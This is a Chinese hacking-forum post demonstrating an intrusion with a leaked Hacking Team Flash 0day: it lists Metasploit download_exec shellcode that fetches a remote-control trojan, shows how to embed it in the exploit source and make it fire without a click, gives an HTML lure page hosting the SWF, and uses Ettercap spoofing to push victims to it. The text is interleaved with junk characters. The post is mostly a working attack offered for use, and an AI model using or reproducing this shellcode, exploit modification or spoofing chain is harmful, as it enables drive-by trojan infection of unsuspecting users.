找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1379|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ C& ^. N) s) [3 { 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 h. b+ O. Y: c

3 N+ k( A7 G# X- n6 T$ z

3 `- {' v4 u2 `$ V$ |0 o 利用到的工具: 4 q+ ?7 A9 g9 D$ w2 a

8 c. y0 @7 s% x) e7 E

, U. K; Y+ x6 d Msf ( Y A1 o0 [. y

% j- \- W+ e( K( T( |

- r& X, x7 Q5 i5 p9 O, d+ W Ettercap - d& ` j' ^# d4 x- I; q

& [0 W C, ^9 C( I* F H0 P

. O8 |- W, V: c1 H Adobe Flash CS6 * ^: g& U- D' I' U( o* m

: P5 W0 O9 c) F7 l

( }6 [* |6 f: D) r: c7 }/ e Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ H& r, t: b$ i# m$ g% d

: b1 ^' \# c& R( p2 ~, n6 a

! k+ G0 V( w/ n$ i 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ( u: i* |( p. i

$ h/ Q) c( _9 j! Z# m9 W5 b5 e. t

p' d- ^: p& F! R 如图: ) I: f7 h5 o4 X" X$ l

' q* b; Y7 Z- v; c' ~3 E$ f3 M

$ o Y. V! h' e   ) O! `4 z# Z8 D& _- v* k

; m, U+ Y9 q0 c- D( P$ j# B- L

. C7 V) ^4 Q: P1 P   $ ~3 V/ z$ ~: B( }* I d

! M* j8 C# E9 X. R' E

' j l+ w! h$ @ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 a% L* S& z7 b# I

$ ?- t P/ d5 j+ @

1 _- q9 M( c$ ]: p% D   % E2 W) b% O6 [* ] W7 O( |

, J% C) i3 c' j; R( J' t

% J8 L0 W. b) Y0 R9 w# c$ n; k! I   $ q; w' g1 x) o9 [0 r C* D9 E

8 E8 {9 D, N# d+ T2 `7 I

' L! s+ ~3 f0 s. n) C4 ? 然后执行generate -t dword生成shellcode,如下: ; }$ U: H- i# s& B: N8 Z9 E

' _+ q% R& n' _4 e

- d7 F% o8 Q# g) o# D- J, Z' v   , I4 f5 l# O2 j

1 ^1 L: r2 m2 K( K2 N

$ }' Z4 I1 O9 j/ v6 U9 L 复制代码到文本下便于我们一会编辑flash exp,如下: 9 C: x) @* [. c( z# k8 [" Q

' ~+ y7 J( I" F9 a8 u% j8 P2 X

/ Y; `# d1 }" f3 S' @8 A 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, . l7 Z, W+ ~! a3 a1 L! K

& V1 n* x( q# `; `! S. w) J1 G

/ _" r3 r; @! c) T0 y9 _ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / Z3 A& B5 }$ n) `9 N

! i% O2 W# D$ F5 I0 H

6 B) \3 u8 L: L8 J } N8 _6 a 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ; c2 N+ Z3 T$ u

! [7 _( u6 i F' ~7 V. U

" h/ ]0 Y, v; b$ ^, L 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, / @6 x+ N# p9 l0 c* H

2 o1 |& e# s1 ]$ g

/ n) r4 x# l/ {4 H& h- U8 G7 } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % H6 ?; j* z8 I+ u

% y3 ?6 O& `+ n4 k

9 N6 j6 a/ e$ @6 E2 H 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 u, _3 B9 r4 S$ R

9 B: u5 e4 ~) Y8 f6 t

( j3 u q. z- {% u# o8 ]1 V 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, M2 p m' _1 i" k# ?

! t5 A( G1 H' c& A" r# F0 l8 L

7 J% k6 N7 |. ]: E' Q& Y 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 0 A# d/ t1 p) P# S5 p8 T9 Y2 f

1 x1 E7 [1 ?# j" G. q" f* G

, _8 ~! ?( D7 |( D2 ?8 D8 Y 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, " e9 y7 V5 [; |- Y& ^( r

. J9 Y& m& ?% a# q* F4 r; ^

( I+ y+ A8 s3 J8 A 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ( G# c; U' }, ]& Y5 m

8 s: g- S7 U. s0 n9 k/ f

: `5 F8 C. x0 u6 {$ [ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 a, k5 F- o1 ~* c. Y

" Q. |) H2 z2 ?! V) s

& x! h4 F& a/ }7 n8 V/ n+ S 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, * ^9 W- |& C: G1 K1 P. b! H

" f% e ~7 E/ |2 M

9 A [5 t, i2 b: O 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 0 q' i. m1 j3 u. d- U1 i* q- x

, n4 F% E2 s( G% X& W' k! J

$ e% ?- o0 T8 S6 |4 r 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % C$ f: o9 l, n7 J( W; \: j

; r# \3 U1 u# O! w

% J! H- }: H- f) Y   % E2 P6 K& w: Q6 s

4 A4 n- |, ]! Q

3 t( S G! |. M1 M- L: V3 m( G   2 d1 A* s3 u* Z

" v3 _* x- U x0 h! B4 k4 V

" |6 j# k5 a0 X% o: h5 F5 t! A 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 J% J) |" O/ a7 L; V* {0 P/ j

, [+ F8 A. ?9 H+ [; D7 b8 f

% ?; a. _& M. X   ; e7 b2 G# v6 l8 @% }

! \; d# a' R9 z2 }( f. @3 A

0 L# z+ s5 h( W8 N 先修改ShellWin32.as,部分源代码如图: : \2 T4 S6 _. ~/ e& J2 T0 H

) ?9 ?1 e; A0 x: b$ w

' R- @. V4 I* S   % q5 l$ z# l! n7 G u

: u* h' |+ O& L0 b

6 N8 w1 _" V0 Q! T& ^. O 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ! m `3 K3 q8 U* G& M* j6 j

+ `$ R) l! [0 @5 i/ @

6 @ a |( a% X; d; ]   + t( l$ B, A% k" s

$ l1 `( q' f' M9 ]* _; ^$ |

# F" M( ?7 z2 Y: v+ P 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ Z4 W. c y3 g6 n5 b! c6 o

$ G& |+ S* v% d1 ]0 N8 u% V! |

$ r1 F( Q# }$ w   2 c. Q+ B4 ?) F8 H

6 A$ o; A5 Q& Z2 Y: v1 i) P

( y. P( K$ K8 |% K: | 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: / ~1 q! @4 |. U

( @6 o' w7 I: ?% _9 m

1 t1 H: S7 \8 _   % v; v3 M5 J( W+ _9 s+ e

8 g5 `, W) e& N% H

& k( ]7 q# ^$ t% S0 ~   7 j n) ~' }% ~3 C9 q8 s- e3 z

- p7 y) U% O+ l0 g; f' N

% W1 t& {9 ]4 k& X0 W& d   ' |# g& G$ x7 P4 \: X1 a

: B1 A4 @0 H) j# Q4 H+ _

7 [$ K" |- w( o- z5 u 然后点保存,下面我们来编译一下,打开 ; t: j" \2 O- M7 Q: o

+ t6 y2 Y" |8 O* l, S8 f5 _

$ X1 Y6 j F8 M; K exp1.fla然后点文件-发布,看看编译没错误 u4 h5 ?! X! n* _" V7 f3 Q4 a

; N( G( }5 p" ?

# H& B* U( T' Y- v- N# P   3 b( d, e' L* \* g6 ~8 }0 @

. a' x. D$ H7 j3 j; o

" i; [; Y2 C% H# J9 P M0 c   8 B8 \' s: w3 r6 D

1 s7 b$ Z9 M% W$ Q: y- q7 e

3 \" T' l3 h4 \- C   4 ^ J1 P/ t* S3 g1 f

4 }2 V$ |) t5 z1 g) `3 n

% u- _! Z/ w- X K |9 w" e   4 N9 m. r. G5 x8 h- t

: P+ q6 f+ d4 n }! C- W' F

* J7 P; o; K/ l; ?1 g2 l- @ 然后我们把生成的 0 k/ w7 Q( t5 `) m. M6 I

* `' i$ v* N: }2 L8 i W* O8 A

+ ]7 O: d" V9 l8 V. ?0 x. ]3 Z exp1.swf丢到kailinux /var/www/html下: ) H1 K- y2 ~; q3 C9 ]* S: C

6 v% u7 Y2 P8 M, L* t% L( o, B% c

0 S& _, m/ _7 U% b% g( n 然后把这段代码好好编辑一下 ) Y) `' e5 u( B0 K- D

" ^+ `. x1 a" w) `2 B

0 D/ f2 f8 |5 `: y- _7 ]/ u   $ y3 b- R$ P; q# ]+ J

2 h0 }7 z3 p/ x5 G% l2 i

& S f# `2 \) `2 e' }* k! O1 }& |4 m   ! Y3 K* P( h" [) | K; u6 D. M

Z# x5 t1 p; R' Y

5 v+ G. {; Q$ M; P' |& X   |, `! ^2 O; U- \, `' L

( ~& }, O1 P- I: n7 Q

& Z a# S) m, m1 E" `' G   ( h0 u+ W! W! [% p: o$ f: G. g+ V

0 o9 _6 S, v/ B7 \# {9 q }

: v5 H' l# H; h" A$ f5 k1 o3 @   ! U' w \" h8 ]

9 ^( A# L$ I* d. n: X2 L9 U! q( d9 s

6 `1 \4 h4 }1 n2 v   " s* v0 J8 D0 g8 _

$ a' L6 a X+ G K

0 c- Q# A/ q) r5 E- p2 Q <!DOCTYPE html> 9 F B- p* g+ T' l% N9 a# @9 I: H

+ E& t o; q. l Z8 ?

& n' |" N0 H( {5 A E- z7 ] <html> 8 X6 T/ c6 y0 u& T; g) B4 s3 {

1 B2 j6 ~" M$ X; ~# }

5 Q2 y4 Y! r3 @; p <head> " }4 p3 q* T' t1 H* {& P+ o4 \

5 ^6 x/ C$ T% n* W4 v

+ g j" q9 g, i) z$ N" ] <meta http-equiv="Content-Type" content="text/html; ; c- i% | m! _# x

( i6 \) l. W2 [1 }3 P: {

) Z/ a% W: _8 L7 ^. Q charset=utf-8"/> * m' \" Z% |% Q: C. T/ r

( v1 X4 r, R* L: k

& L& e8 W) ^# R7 b, f# _ </head> 2 D5 h3 ]% q2 _" V) _- s l

/ w( F+ J, q" Q

9 y q& `- t3 t) _ @; J% F5 j$ r) D <body> " L5 g7 Y& u7 X' g: Q

+ l# q, }. t2 o& y2 K# M; t3 p- Y

! s' I: x' e5 j+ k* \6 Q <h2> Please wait, the requested page is loading...</h2> 0 J+ {/ R' f* ]! C+ [) {; r

; a2 d: n+ l8 W

/ i* ?& ^0 F3 Y' z# i <br> 8 ?! Q) t( A( V3 u& H

& n" {$ A; Y3 v0 ]" v+ B5 ]3 O

: F4 B6 e9 H9 _, C. y <OBJECT 8 n4 H* o4 ^# p! c' P: u! t

# j0 i/ y8 C' E5 F

4 e) `- \% X0 j' S& X classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ; b$ u% \8 y |; l6 O" G

: b* [) S3 [: {% b S" Y9 E f

; m. ?9 P. O# Z, _8 ?3 g VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 8 [, Y, I+ e4 U5 i2 | h! [! p! H

4 J3 W* e- y+ A

% s$ `: c# I& o </body> ! s+ A. V! a+ x

! }- K! {( C0 _

: c' W) K7 s% B m# q <script> : x5 I* z0 L; |6 K8 h! g

5 Q4 m" ^0 h$ D% J$ O: T% y; D; W

: y& u) Y- T. w1 E3 C     setTimeout(function () { , S, _% C- O* S+ ]% I) ]

f( p C8 m* O y! b/ q2 O

P" m4 e, j7 h          - l7 ^) }7 l) X+ y

& F0 u6 f$ [% [8 h& G, M

" J% i% `: e; K+ x1 z: w- f9 B window.location.reload(); ; l6 {% G( h9 W! p% q1 n

/ D8 ?1 q1 U1 s F, @ M B0 p

) Y, \& o4 I' d2 B0 J. t4 F     }, 10000); & H- H: N/ _, B$ ~5 T

( F) u9 w! H( g+ W3 N# J/ W

, j- T- E+ k6 O' w; w   / Q* X/ `( b2 ^

" a# ~! W( y- p9 n

; l( S/ l5 X, P& A: R" K( u </script> / T$ \! e. C7 v! ?0 Q* N

z9 D n' Y/ @# h* P" ?

2 `0 |' k# `' T/ d! l </html> / d' \: M+ M& X1 g1 C- N

$ j: V5 ~; }' P& K, Y

5 w( L, L7 E* [5 M/ ]1 `   ( O' ?: K5 {2 c* ~# z, t# k C$ t

8 X" S1 j3 J3 Z* a. l* j

! j9 b& K: @ u" e! F 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 1 b9 g7 t: g8 m. U: `! e0 q( V

2 y8 w! p0 q/ p9 _ }1 x- h

% j+ f: ~7 l. j( Z   7 u. m+ n N% C+ ]% l- Y) [" y$ L

! K: A9 X# I. m( A; w; @4 P0 t

/ _* l: O- T- a1 u @   & X/ _6 l) R! R: Y

" _3 B5 @9 i) h3 I& H9 k9 h

5 x5 n+ z+ [6 n' Q0 L   1 ]. p& I+ S) H8 A4 D* y- c

; ~2 F0 [; ~; k, z. ?; }! e) L! q

9 \6 x8 E5 ]3 t* |. Z, l   ; f' y( P0 _# \3 t6 N; s! u

& {: z. v. c* b4 N8 Z |1 {

9 u- a# {% Y3 O9 j/ g' R   3 a: [, _- n' P9 l

$ R h1 v5 \: n" `7 p% j

, x' A. ^! T6 [) u4 K g7 m 下面我们用ettercap欺骗如图: ( a! m! V4 T) F6 o& g2 ?9 [7 Z. z

! A! Z# `, D! X

% [5 x G- D4 K$ C2 H   / E6 i: l5 H3 Z2 f9 K/ p

# Q5 e8 \1 n4 q7 C5 `, P& p

, G: e% \. a7 L6 ^* E   2 p: v8 ]7 [% Z/ x5 x! p) a7 n

( ^8 H8 @( g' ]! b- J/ k

$ D- ?6 H/ {- h 下面我们随便访问个网站看看: " c: @% N7 J, J# o- d1 _+ ^) H

# u' V2 l+ }9 I4 h# S

* @7 c. d2 ^, V1 {$ e. L' Z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) q& ~' O% C5 N" i* H# D

j7 Q ?) T3 j7 g9 \, Z, Z( b$ ]

) k0 Z" L. }" Q! \$ }   ! V4 U0 t1 O9 v2 C+ W

( u$ m) }/ R8 m, l0 f

" h/ }" M+ ~/ l, I$ d 我们看另一台, % \: n9 B( N- G

# G: `: d1 d! p. j7 t$ i- x

_1 |, W* u( d0 M 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 8 C. V. q# }, \) X" N* N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表